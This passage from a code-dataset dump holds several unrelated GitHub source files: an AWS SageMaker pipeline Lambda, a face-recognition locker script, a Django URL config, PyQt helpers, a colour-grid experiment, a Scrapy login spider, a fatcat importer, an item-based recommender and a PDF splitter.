s3.Object(bucketname,objectKey)\n \n item = json.loads(obj.get()['Body'].read().decode('utf-8'))\n \n return item\n\ndef write_job_info_s3(event, writeData):\n\n objectKey = event['CodePipeline.job']['data']['outputArtifacts'][0]['location']['s3Location']['objectKey']\n\n bucketname = event['CodePipeline.job']['data']['outputArtifacts'][0]['location']['s3Location']['bucketName']\n\n artifactCredentials = event['CodePipeline.job']['data']['artifactCredentials']\n\n artifactName = event['CodePipeline.job']['data']['outputArtifacts'][0]['name']\n json_data = json.dumps(writeData, indent=4, sort_keys=True, default=str)\n\n print(json_data)\n\n session = Session(aws_access_key_id=artifactCredentials['accessKeyId'],\n aws_secret_access_key=artifactCredentials['secretAccessKey'],\n aws_session_token=artifactCredentials['sessionToken'])\n \n\n s3 = session.resource(\"s3\")\n #object = s3.Object(bucketname, objectKey + 
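The `continue_job_later` helper above relies on CodePipeline's continuation-token mechanism: returning a success result *with* a `continuationToken` causes CodePipeline to re-invoke the Lambda later with that token, which is how a long-running SageMaker job is polled without blocking. A stripped-down sketch of the pattern; `external_job_finished` is a hypothetical placeholder for the actual status probe:

```python
import json
import boto3

code_pipeline = boto3.client('codepipeline')

def poll_handler(event, context):
    job_id = event['CodePipeline.job']['id']

    if external_job_finished():  # hypothetical status probe
        code_pipeline.put_job_success_result(jobId=job_id)
    else:
        # Success *with* a continuationToken schedules another invocation,
        # carrying the token's state forward to the next call.
        code_pipeline.put_job_success_result(
            jobId=job_id,
            continuationToken=json.dumps({'previous_job_id': job_id}))

def external_job_finished():
    # Placeholder for e.g. sagemaker.describe_training_job(...) status checks.
    return False
```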
'/event.json')\n object = s3.Object(bucketname, objectKey)\n print(object)\n object.put(Body=json_data, ServerSideEncryption='aws:kms', SSEKMSKeyId=SSEKMSKeyId)\n print('[INFO]event written to s3')","repo_name":"aws-samples/mlops-amazon-sagemaker","sub_path":"1-Built-In-Algorithm/lambda-code/MLOps-BIA-GetStatus.py","file_name":"MLOps-BIA-GetStatus.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","stars":268,"dataset":"github-code","pt":"53"} +{"seq_id":"358580970","text":"import face_recognition\nimport cv2\nimport numpy as np\nimport os\nimport sys\n\ncurDir = os.getcwd()\n# basePath = 'public/uploads'\nbasePath = os.path.join(curDir, 'public', 'uploads')\nlockerid = sys.argv[1]\nwhom_var = sys.argv[2]\nwhat_var = sys.argv[3]\n\nencodingPath = os.path.join(curDir, 'encodings', lockerid)\nencodingFile = f'{encodingPath}.npy'\n\n\ndef appendImage(path, image, lst):\n curImg = cv2.imread(os.path.join(path, image))\n lst.append(curImg)\n classNames.append(os.path.splitext(image)[0])\n\n\nif what_var == 'enco':\n if(os.path.exists(encodingFile)):\n print('SM_ENCOS')\n else:\n banker_img = os.path.join(basePath, 'banker')\n user_img = os.path.join(basePath, lockerid)\n print(user_img)\n images = []\n classNames = []\n bankerDir = os.listdir(banker_img)\n userDir = os.listdir(user_img)\n # print(myList)\n for cl in bankerDir:\n appendImage(banker_img, cl, images)\n for cl in userDir:\n appendImage(user_img, cl, images)\n\n def findEncodings(images):\n encodeList = []\n for img in images:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n encode = face_recognition.face_encodings(img)[0]\n encodeList.append(encode)\n return encodeList\n\n encodeListKnown = findEncodings(images)\n with open(encodingFile, 'wb') as f:\n np.save(f, [classNames, encodeListKnown], allow_pickle=True)\n print('SM_ENCOS')\n\n# print(classNames)\n\n\nif what_var == 'reco':\n\n with open(f'{encodingPath}.npy', 'rb') as f:\n loaded_data = np.load(f, allow_pickle=True)\n classNames = loaded_data[0]\n encodeListKnown = loaded_data[1]\n # print(classNames, encodeListKnown)\n\n cap = cv2.VideoCapture(0)\n while True:\n success, img = cap.read()\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\n facesCurFrame = face_recognition.face_locations(imgS)\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\n matches = face_recognition.compare_faces(\n encodeListKnown, encodeFace)\n faceDis = face_recognition.face_distance(\n encodeListKnown, encodeFace)\n print(faceDis)\n matchIndex = np.argmin(faceDis)\n if matches[matchIndex]:\n name = classNames[matchIndex].upper()\n print(name)\n y1, x2, y2, x1 = faceLoc\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.rectangle(img, (x1, y2-35), (x2, y2),\n (0, 255, 0), cv2.FILLED)\n cv2.putText(img, name, (x1 + 6, y2-6),\n cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\n\n cv2.imshow('Webcam', img)\n cv2.waitKey(1)\n","repo_name":"Aashi1109/digilocker","sub_path":"fr_final.py","file_name":"fr_final.py","file_ext":"py","file_size_in_byte":3048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16573957503","text":"# remove_none_values removes all keys from a dictionary\n# where the value was None\ndef remove_none_values(dict):\n keys_to_delete = []\n for key, value in dict.items():\n if value is 
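`compare_faces`, used in the recognition loop above, is essentially a thresholded wrapper around `face_distance`: the default tolerance is 0.6, and lowering it makes matching stricter. A small sketch of how the two relate; the image paths are placeholders and each image is assumed to contain exactly one face:

```python
import face_recognition

known = face_recognition.load_image_file('known_person.jpg')  # placeholder path
probe = face_recognition.load_image_file('probe.jpg')         # placeholder path

known_enc = face_recognition.face_encodings(known)[0]  # assumes one face per image
probe_enc = face_recognition.face_encodings(probe)[0]

dist = face_recognition.face_distance([known_enc], probe_enc)[0]
match = face_recognition.compare_faces([known_enc], probe_enc, tolerance=0.6)[0]
print(dist, match)  # match is True exactly when dist <= tolerance
```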
None:\n            keys_to_delete.append(key)\n    for key_to_delete in keys_to_delete:\n        del dict[key_to_delete]\n    return dict\n","repo_name":"gregoryholl/gregoryholl","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"26557074701","text":"\"\"\"rentATractor URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom app import views\nimport django.views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', views.index, name=\"homepage\"),\n    path('login', views.login),\n    path('logout/', views.logout),\n    path('register/', views.register),\n    path('catalogo/',views.catalogo),\n    path('producto/<id>',views.producto),\n    path('cesta/', views.cesta),\n    path('cesta/<id>/', views.addCesta),\n    path('cesta/remove/<id>/', views.removeCesta),\n    path('cesta/update/<id>/<cantidad>/', views.updateCesta),\n    path('domicilioPago/', views.domicilioPago),\n    path('borraPedido/', views.remove_pedido),\n    path('create-checkout-session', views.payment_checkout),\n    path('pago/', views.pago),\n    path('confirmacion/', views.confirmacion),\n    path('factura/', views.factura),\n    path('cancelar/', views.cancelar),\n    path('miCuenta/', views.miCuenta),\n    path('favoritos/', views.favoritos),\n    path('favoritos/<id>', views.addFavorito),\n    path('misPedidos/', views.misPedidos),\n    path('sobreNosotros/', views.sobreNosotros),\n    path('contacto/', views.contacto),\n    path('atencionCliente/', views.atencionCliente),\n    path('seguimientoPedidos/', views.seguimientoPedidos),\n    path('politicaDevolucion/', views.politicaDevolucion),\n    path('politicaEnvio/', views.politicaEnvio),\n    path('reclamacion/', views.reclamacion),\n    path('opinion/', views.opinion),\n    path('terminosCondicionesUso/', views.terminosCondicionesUso),\n    path('politicaPrivacidad/', views.politicaPrivacidad),\n    path('condicionesAlquiler/', views.condicionesAlquiler),\n    path('media/<path>', django.views.static.serve,\n         {'document_root': settings.MEDIA_ROOT}),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"marsamber/PGPI","sub_path":"code/rentATractor/rentATractor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4323342425","text":"\"\"\"Base module helper for UI.\n\nRegroups helpers for UI classes: the widget_ui, communication_handler and the\ninner EventLogger.\n\nModule : base_ui\nAuthors : yannick, vincet\n\"\"\"\nimport logging\nimport PyQt6.QtCore\nimport PyQt6.QtWidgets\nimport PyQt6.uic\nimport helper\nimport serial_comms\n\n\nclass EventLogger(PyQt6.QtCore.QObject):\n    \"\"\"Manage all operations on the log_event signal and receiver registration.\"\"\"\n\n    __log_event = PyQt6.QtCore.pyqtSignal(str)\n\n    def __init__(self):\n        
\"\"\"Init the mandatory QObject to manage Signal.\"\"\"\n PyQt6.QtCore.QObject.__init__(self)\n\n def log_message(self, msg: str):\n \"\"\"Send the log message to all receiver.\"\"\"\n self.__log_event.emit(msg)\n\n def register_to_logger(self, logger):\n \"\"\"Register a receiver on the log signal.\"\"\"\n self.__log_event.connect(logger)\n\n def unregister_to_logger(self, logger):\n \"\"\"Unregister a receiver on the log signal.\"\"\"\n self.__log_event.disconnect(logger)\n\n\nclass WidgetUI(PyQt6.QtWidgets.QWidget):\n \"\"\"Load the .ui file and set item to the current class. Provide a quick access to logger.\"\"\"\n\n logger = EventLogger()\n tech_log : logging.Logger = None \n\n def __init__(self, parent: PyQt6.QtWidgets.QWidget = None, ui_form: str = \"\"):\n \"\"\"Load the .ui file and map it.\"\"\"\n PyQt6.QtWidgets.QWidget.__init__(self, parent)\n self.tech_log = logging.getLogger(ui_form)\n if ui_form:\n PyQt6.uic.loadUi(helper.res_path(ui_form), self)\n\n def init_ui(self):\n \"\"\"Prototype of init_ui to manage this status in subclass.\"\"\"\n return True\n\n def log(self, message):\n \"\"\"Access to the internal logger and offer a log message to all subclass.\"\"\"\n self.logger.log_message(message)\n\n\nclass CommunicationHandler:\n \"\"\"Store the serial communication to share it to subclass and offer register operation.\"\"\"\n\n CMDFLAG_GET\t= 0x01\n CMDFLAG_SET\t =\t0x02\n CMDFLAG_INFOSTRING\t= 0x08\n CMDFLAG_GETADR\t =\t0x10\n CMDFLAG_SETADR\t =\t0x20\n CMDFLAG_HIDDEN\t= 0x40\n CMDFLAG_DEBUG\t= 0x80\n\n comms: serial_comms.SerialComms = None\n\n def __init__(self):\n \"\"\"Do nothing on the constructor.\"\"\"\n\n def __del__(self):\n \"\"\"Unregister all callback on class destruction.\"\"\"\n self.remove_callbacks()\n\n # deletes all callbacks to this class\n def remove_callbacks(self, handler = None):\n \"\"\"Remove all callback in SerialComms object (static).\"\"\"\n if handler is None : handler = self\n serial_comms.SerialComms.removeCallbacks(handler)\n\n def register_callback(\n self,\n cls,\n cmd,\n callback,\n instance=0,\n conversion=None,\n adr=None,\n delete=False,\n typechar=\"?\",\n ):\n \"\"\"Register a callback that can be deleted automatically later.\"\"\"\n # Callbacks normally must prevent sending a value change command in this callback\n # to prevent the same value from being sent back again\n serial_comms.SerialComms.registerCallback(\n self,\n cls=cls,\n cmd=cmd,\n callback=callback,\n instance=instance,\n conversion=conversion,\n adr=adr,\n delete=delete,\n typechar=typechar,\n )\n\n def get_value_async(\n self,\n cls,\n cmd,\n callback,\n instance: int = 0,\n conversion=None,\n adr=None,\n typechar=\"?\",\n delete=True,\n ):\n \"\"\"Ask a value to the board from in async way.\"\"\"\n self.comms.getValueAsync(\n self,\n cls=cls,\n cmd=cmd,\n callback=callback,\n instance=instance,\n conversion=conversion,\n adr=adr,\n typechar=typechar,\n delete=delete,\n )\n\n def serial_write_raw(self, cmd):\n \"\"\"Write a command in direct mode througt serial.\"\"\"\n self.comms.serialWriteRaw(cmd)\n\n def send_value(self, cls, cmd, val, adr=None, instance=0):\n \"\"\"Send a value for a specific paramter to the board.\"\"\"\n self.comms.sendValue(\n self, cls=cls, cmd=cmd, val=val, adr=adr, instance=instance\n )\n\n def send_command(self, cls, cmd, instance=0, typechar=\"?\",adr=None):\n \"\"\"Send one command to the board.\"\"\"\n self.comms.sendCommand(cls, cmd, instance=instance, typechar=typechar,adr=adr)\n\n def send_commands(self, cls, cmds, instance=0, 
typechar=\"?\",adr=None):\n \"\"\"Send colection of command to the board.\"\"\"\n cmdstring = \"\"\n for cmd in cmds:\n if adr != None:\n cmdstring += f\"{cls}.{instance}.{cmd}{typechar}{adr};\"\n else:\n cmdstring += f\"{cls}.{instance}.{cmd}{typechar};\"\n self.comms.serialWriteRaw(cmdstring)\n\n def comms_reset(self):\n \"\"\"Send the reset reply.\"\"\"\n self.comms.reset()\n\n def process_virtual_comms_buffer(self, buffer:str):\n \"\"\"Inject the string buffer in the comms parser and process it as it a board answer.\"\"\"\n first_end_marker = buffer.find(\"]\")\n first_start_marker = buffer.find(\"[\")\n match = self.comms.cmdRegex.search(\n buffer, first_start_marker, first_end_marker + 1\n )\n if match:\n self.comms.processMatchedReply(match)\n self.comms.processMatchedReply(match)\n\n def get_raw_reply(self):\n \"\"\"Expose the raw reply pySignal to connect on it.\"\"\"\n return self.comms.rawReply\n","repo_name":"Ultrawipf/OpenFFBoard-configurator","sub_path":"base_ui.py","file_name":"base_ui.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"53"} +{"seq_id":"12470115021","text":"import numpy as np\nimport psychopy as py\nimport matplotlib as mpl \nimport pandas as pd \nfrom skimage.color import rgb2hsv, hsv2rgb \nimport matplotlib.pyplot as mplpy \nimport cv2\nfrom copy import deepcopy\n\nnumBlocks = 3 #number of blocks in rows or columns (so n = 3 is a 3x3 grid) \ngridSize = 150 #overall pixels in grid \nGridType = 2\nnTrialTypes = 2\n\ncounter = 0\nprint('Instructions: In each round, two colored grids will be displayed (one after the other). When prompted, indicate whether the two grids were the same or different.')\nanswer_vector = []\ngroundtruth = [] #keeping track of whether the grid is disharmonious or harmonious\nsamedifferent = [] #keeping track of whether the grid was the same or different in the trial\n\nwhile counter <= 6: #the program will run for 5 rounds \n counter += 1\n blankMat = np.zeros((gridSize,gridSize))\n \n trialType = np.random.randint(GridType) #if trial type =1 harmonious, if 2, disharmonious\n groundtruth.append(trialType) #trying to concatonate\n #trialType = 1 #right now, just shortcut for it to be 1 -- once we have code for trialType = 2 we can delete\n useHSV = True\n #import ipdb; ipdb.set_trace()\n\n if trialType == 0: # harmonious -----------------------------\n pass\n\n else: #if trialType == 1 --> disharmonious grid \n if useHSV:\n print(\"disharmonious\")\n randomHue = np.random.rand(numBlocks,numBlocks) #picking one color channel and random int within that color\n # c should give number between 0 and 1 for HUE\n randomSat = np.random.rand(numBlocks, numBlocks)\n #randomSat creates a numB by numBlocks matrix, filled with values from 0 to 1 \n randomValue = 0.2 * np.random.rand() + 0.8 #making sure that the value is never 0\n #resizedChannel = cv2.resize(randomSat.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT)\n displayImage = np.zeros((numBlocks,numBlocks,3), dtype=np.float32) #the 3 is for color channels \n displayImage[:,:,0] = randomHue #+= because randomHue is a single number, not a matrix\n displayImage[:,:,1] = randomSat #randomSat is a matrix \n displayImage[:,:,2] += randomValue\n \n RGBImage = hsv2rgb(displayImage) * 255\n RGBImage = cv2.resize(RGBImage.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT) \n \n else: \n pass \n\n mplpy.imshow(RGBImage)\n mplpy.axis('off')\n mplpy.pause(3)\n 
\n    mplpy.imshow(blankMat)\n    mplpy.axis('off')\n    mplpy.pause(3)\n    \n\n    GridSD = np.random.randint(nTrialTypes)\n    samedifferent.append(GridSD)\n    \n    if GridSD == 0: #Show the same disharmonious grid as user just saw -----------------------\n        print('Disharmonious Same')\n        \n        mplpy.imshow(RGBImage) #showing same grid\n        mplpy.axis('off')\n        mplpy.pause(3)\n\n        mplpy.imshow(blankMat)\n        mplpy.axis('off')\n        mplpy.pause(3)\n\n    else: #if GridSD == 1, show the original disharmonious grid, with one lego different \n        print('Disharmonious Different')\n        funkyLegoX = np.random.randint(numBlocks)\n        funkyLegoY = np.random.randint(numBlocks)\n        funkyLegoGrid = deepcopy(displayImage)\n\n        # change hue and saturation for a randomly selected pixel\n        funkyLegoGrid[funkyLegoX, funkyLegoY, 0] = np.random.rand()\n        funkyLegoGrid[funkyLegoX, funkyLegoY, 1] = np.random.rand()\n        funkyLegoGrid = hsv2rgb(funkyLegoGrid) * 255 \n        funkyLegoGrid = cv2.resize(funkyLegoGrid.astype(np.uint8), (gridSize,gridSize), interpolation=cv2.INTER_NEAREST_EXACT)\n        \n        mplpy.imshow(funkyLegoGrid) #showing the new disharmonious grid\n        mplpy.axis('off')\n        mplpy.pause(3)\n\n        mplpy.imshow(blankMat)\n        mplpy.axis('off')\n        mplpy.pause(3)\n\n\n    \n    \n    \n    \n\n    \n\n\n\n\n\n    ","repo_name":"rachelecarlson/teampurple2.0FINAL-","sub_path":"disharmonious grid .py","file_name":"disharmonious grid .py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73676344489","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GithubSpider(scrapy.Spider):\n    name = 'github'\n    allowed_domains = ['github.com']\n    start_urls = ['https://github.com/login']\n\n    def parse(self, response):\n        authenticity_token = response.xpath(\"//input[@name='authenticity_token']/@value\").extract_first()\n        utf8 = response.xpath(\"//input[@name='utf8']/@value\").extract_first()\n        commit = response.xpath(\"//input[@name='commit']/@value\").extract_first()\n        post_data = dict(\n            # fill in your account name\n            login=\"\",\n            # fill in your password\n            password=\"\",\n            authenticity_token=authenticity_token,\n            utf8=utf8,\n            commit=commit\n        )\n        yield scrapy.FormRequest(\n            \"https://github.com/session\",\n            formdata=post_data,\n            callback=self.after_login\n        )\n\n    def after_login(self,response):\n        if response.url == \"https://github.com/\":\n            print('登陆成功')\n        else:\n            print('登陆失败')\n","repo_name":"wangquan1024/webSpider","sub_path":"scrapy_demo/github_spider/github_spider/spiders/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"41889394172","text":"from django.conf.urls import patterns, url\nfrom data import views\n\nurlpatterns = patterns('',\n    url(r'^$', views.index, name='index'),\n    url(r'^happiness/$', views.happiness, name='happiness'),\n    url(r'^sleep/$', views.sleep, name='sleep'),\n    url(r'^summary/$', views.summary, name='summary'),\n    url(r'^edit/(?P[0-9]+)/$', views.edit, name='edit')\n)","repo_name":"theyiwen/reportersite","sub_path":"data/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"22106171218","text":"from typing import Any, Dict, List, Optional\n\nimport fatcat_openapi_client\nfrom fatcat_openapi_client import ApiClient, FileEntity\n\nfrom fatcat_tools.normal import clean_doi\n\nfrom .common import SANE_MAX_RELEASES, SANE_MAX_URLS, EntityImporter, 
make_rel_url\n\n\nclass MatchedImporter(EntityImporter):\n \"\"\"\n Importer for \"file to crossref DOI\" matches.\n\n These matches are currently generated by Internet Archive hadoop jobs\n written in scala (part of the 'sandcrawler' repo/project), but could be\n generated by other parties as well.\n\n Input format is JSON with keys:\n - dois (list)\n - sha1 (hex)\n - md5 (hex)\n - sha256 (hex)\n - size (int)\n - cdx (list of objects)\n - dt (optional; if included creates wayback link)\n - url\n - mimetype\n - urls (list of strings... or objects?)\n\n Future handlings/extensions:\n - core_id, wikidata_id, pmcid, pmid: not as lists\n \"\"\"\n\n def __init__(self, api: ApiClient, **kwargs) -> None:\n\n eg_desc = (\n kwargs.pop(\"editgroup_description\", None)\n or \"Import of large-scale file-to-release match results. Source of metadata varies.\"\n )\n eg_extra = kwargs.pop(\"editgroup_extra\", dict())\n eg_extra[\"agent\"] = eg_extra.get(\"agent\", \"fatcat_tools.MatchedImporter\")\n super().__init__(api, editgroup_description=eg_desc, editgroup_extra=eg_extra, **kwargs)\n self.default_link_rel = kwargs.get(\"default_link_rel\", \"web\")\n self.default_mimetype = kwargs.get(\"default_mimetype\", None)\n\n def want(self, raw_record: Any) -> bool:\n return True\n\n def parse_record(self, obj: Dict[str, Any]) -> Optional[FileEntity]:\n dois = [d.lower() for d in obj.get(\"dois\", [])]\n\n # lookup dois\n re_list = set()\n for doi in dois:\n doi = clean_doi(doi)\n if not doi:\n self.counts[\"skip-bad-doi\"] += 1\n return None\n try:\n re = self.api.lookup_release(doi=doi)\n except fatcat_openapi_client.rest.ApiException as err:\n if err.status != 404:\n raise err\n re = None\n if re is None:\n # print(\"DOI not found: {}\".format(doi))\n pass\n else:\n re_list.add(re.ident)\n\n # look up other external ids\n for extid_type in (\n \"arxiv\",\n \"pmid\",\n \"pmcid\",\n \"jstor\",\n \"wikidata_qid\",\n \"core\",\n \"isbn13\",\n \"ark\",\n ):\n extid = obj.get(extid_type)\n if extid:\n try:\n re = self.api.lookup_release(**{extid_type: extid})\n except fatcat_openapi_client.rest.ApiException as err:\n if err.status != 404:\n raise err\n re = None\n if re is None:\n pass\n else:\n re_list.add(re.ident)\n\n release_ids = list(re_list)\n if len(release_ids) == 0:\n self.counts[\"skip-no-releases\"] += 1\n return None\n if len(release_ids) > SANE_MAX_RELEASES:\n self.counts[\"skip-too-many-releases\"] += 1\n return None\n\n # parse URLs and CDX\n urls_set = set()\n for url in obj.get(\"urls\", []):\n url = make_rel_url(url, default_link_rel=self.default_link_rel)\n if url is not None:\n urls_set.add(url)\n for cdx in obj.get(\"cdx\", []):\n original = cdx[\"url\"]\n if cdx.get(\"dt\"):\n wayback = \"https://web.archive.org/web/{}/{}\".format(cdx[\"dt\"], original)\n urls_set.add((\"webarchive\", wayback))\n url = make_rel_url(original, default_link_rel=self.default_link_rel)\n if url is not None:\n urls_set.add(url)\n urls = [fatcat_openapi_client.FileUrl(rel=rel, url=url) for (rel, url) in urls_set]\n if len(urls) == 0:\n self.counts[\"skip-no-urls\"] += 1\n return None\n if len(urls) > SANE_MAX_URLS:\n self.counts[\"skip-too-many-urls\"] += 1\n return None\n\n size = obj.get(\"size\")\n if size:\n size = int(size)\n\n mimetype = obj.get(\"mimetype\", self.default_mimetype)\n if not mimetype and urls:\n if urls[0].url.endswith(\".pdf\"):\n mimetype = \"application/pdf\"\n\n fe = FileEntity(\n md5=obj.get(\"md5\"),\n sha1=obj[\"sha1\"],\n sha256=obj.get(\"sha256\"),\n size=size,\n mimetype=mimetype,\n 
release_ids=release_ids,\n            urls=urls,\n        )\n        return fe\n\n    def try_update(self, fe: FileEntity) -> bool:\n        # lookup sha1, or create new entity\n        existing = None\n        try:\n            existing = self.api.lookup_file(sha1=fe.sha1)\n        except fatcat_openapi_client.rest.ApiException as err:\n            if err.status != 404:\n                raise err\n\n        if not existing:\n            return True\n\n        combined_release_ids = list(set(fe.release_ids + existing.release_ids))\n        if set(combined_release_ids) == set(existing.release_ids) and len(existing.urls) > 0:\n            # no new release matches *and* there are already existing URLs\n            self.counts[\"exists\"] += 1\n            return False\n\n        # check for edit conflicts\n        if existing.ident in [e.ident for e in self._edits_inflight]:\n            self.counts[\"skip-update-inflight\"] += 1\n            return False\n\n        # minimum viable \"existing\" URL cleanup to fix dupes and broken links:\n        # remove 'None' wayback URLs, and set archive.org rel 'archive'\n        existing.urls = [\n            u for u in existing.urls if not (\"://web.archive.org/web/None/\" in u.url)\n        ]\n        for i in range(len(existing.urls)):\n            u = existing.urls[i]\n            if u.rel == \"repository\" and \"://archive.org/download/\" in u.url:\n                existing.urls[i].rel = \"archive\"\n\n        # special case: if importing *new* from archive.org arxiv collections,\n        # blow away any existing release_id mappings; this is a direct arxiv_id\n        # map. This *should* be safe to run in all matched imports.\n        is_arxiv = False\n        for u in fe.urls:\n            if \"archive.org/download/arxiv\" in u.url.lower():\n                is_arxiv = True\n                break\n        if is_arxiv and fe.release_ids:\n            existing.release_ids = fe.release_ids\n\n        # merge the existing into this one and update\n        existing.urls = list(set([(u.rel, u.url) for u in fe.urls + existing.urls]))\n        existing.urls = [\n            fatcat_openapi_client.FileUrl(rel=rel, url=url) for (rel, url) in existing.urls\n        ]\n\n        if len(existing.urls) > SANE_MAX_URLS:\n            self.counts[\"skip-update-too-many-url\"] += 1\n            return False\n        existing.release_ids = list(set(fe.release_ids + existing.release_ids))\n        if len(existing.release_ids) > SANE_MAX_RELEASES:\n            self.counts[\"skip-update-too-many-releases\"] += 1\n            return False\n        existing.mimetype = existing.mimetype or fe.mimetype\n        existing.size = existing.size or fe.size\n        existing.md5 = existing.md5 or fe.md5\n        existing.sha1 = existing.sha1 or fe.sha1\n        existing.sha256 = existing.sha256 or fe.sha256\n        edit = self.api.update_file(self.get_editgroup_id(), existing.ident, existing)\n        self._edits_inflight.append(edit)\n        self.counts[\"update\"] += 1\n        return False\n\n    def insert_batch(self, batch: List[FileEntity]) -> None:\n        self.api.create_file_auto_batch(\n            fatcat_openapi_client.FileAutoBatch(\n                editgroup=fatcat_openapi_client.Editgroup(\n                    description=self.editgroup_description, extra=self.editgroup_extra\n                ),\n                entity_list=batch,\n            )\n        )\n","repo_name":"internetarchive/fatcat","sub_path":"python/fatcat_tools/importers/matched.py","file_name":"matched.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"}
{"seq_id":"16840703279","text":"from tqdm import tqdm\nimport math\n\nclass ItemCF:\n\n    def __init__(self, train_data: dict, test_data: dict):\n        \"\"\"\n        ItemCF model\n        Args:\n            train_data: dict, key = userID, value = set(movieID), inverted index from user to items\n            test_data: dict, key = userID, value = set(movieID), inverted index from user to items\n        \"\"\"\n        self.train_userItems = train_data\n        self.test_userItems = test_data\n        # compute the similarity matrix\n        self.sim = self.calsimilarity()\n\n\n    def calsimilarity(self) -> dict:\n        
\"\"\"\n Returns:\n similarity: dict, 相似度矩阵, sim[i][j]代表item_i和item_j之间的相似度\n \"\"\"\n sim = {} # 记录item_i和item_j之间共同交互过的用户数量, 对应user-item共现矩阵列向量的内积\n num = {} # 记录item_i所交互过的用户数量, 对应user-item共现矩阵列向量的大小\n for userid, items in tqdm(self.train_userItems.items(), desc=\"构建协同过滤矩阵>>>\"):\n for item_i in items:\n # item_i交互过的用户数量+1\n if item_i not in num:\n num[item_i] = 0\n num[item_i] += 1\n # 两两item之间被同一个用户点击过\n if item_i not in sim:\n sim[item_i] = {}\n for item_j in items:\n if item_i != item_j:\n if item_j not in sim[item_i]:\n sim[item_i][item_j] = 0\n sim[item_i][item_j] += 1\n # 计算相似度矩阵\n for item_i, items in tqdm(sim.items(), desc=\"计算相似度>>>\"):\n for item_j, score in items.items():\n sim[item_i][item_j] = score / math.sqrt(num[item_i] * num[item_j]) # 余弦相似度\n return sim\n def rec(self, K: int, N: int) -> dict:\n \"\"\"\n Args:\n K: int, 为用户交互过的每个item, 选择与其最相似的K个项目\n N: int, 给用户推荐的项目数量N\n Returns:\n items_rank: dict, items_rank[u]表示为用户u推荐的N个item集合\n \"\"\"\n items_rank = {}\n for u, _ in tqdm(self.test_userItems.items(), desc=\"TopN推荐>>>\"):\n items_rank[u] = {}\n for hist_item in self.train_userItems[u]: # 用户u历史上交互过的一个hist_item\n # 计算与hist_item相似的其他物品\n for item, score in sorted(self.sim[hist_item].items(), key=lambda x: x[1], reverse=True)[:K]: # 选择最相似的K个物品\n if item not in self.train_userItems[u]:\n if item not in items_rank[u]:\n items_rank[u][item] = 0\n items_rank[u][item] += score # 用户u对item的可能评分\n # 对item排序\n items_rank = {k: sorted(v.items(), key=lambda x: x[1], reverse=True)[:N] for k, v in items_rank.items()}\n items_rank = {k: set(x[0] for x in v) for k, v in items_rank.items()}\n return items_rank\n\n\n\n\n\n \n\n\n\n ","repo_name":"ADCa97/DLRS","sub_path":"recmodel/CF/ItemCF.py","file_name":"ItemCF.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41661693694","text":"import os\n\nfrom PyPDF2 import PdfReader, PdfWriter, PageObject\n\nfrom util import get_filename\n\n\ndef split_array_by_interval(array: list, interval: int) -> list[list]:\n \"\"\"Split an array by interval.\n\n Args:\n array (list): Array to split.\n interval (int): Size of the chunks.\n\n Returns:\n list[list]: List of splitted chunks.\n \"\"\"\n splitted_array = []\n\n for i in range(0, len(array), interval):\n splitted_array.append(array[i:i+interval])\n\n return splitted_array\n\n\ndef split_array_by_ranges(array: list, ranges: list[tuple]) -> list[list]:\n \"\"\"Split an array by ranges.\n\n Args:\n array (list): List to split.\n ranges (list[tuple]): Ranges as list of tuples (end, start).\n\n Returns:\n list[list]: List of splitted chunks.\n \"\"\"\n splitted_array = []\n\n for start, end in ranges:\n sub_array = array[start - 1:end]\n if sub_array:\n splitted_array.append(sub_array)\n\n return splitted_array\n\n\ndef write_pdf_chunks(pdf_chunks: list, destination: str, filename: str):\n\n if not os.path.exists(destination):\n os.makedirs(destination)\n\n for index, chunk in enumerate(pdf_chunks):\n writer = PdfWriter()\n\n 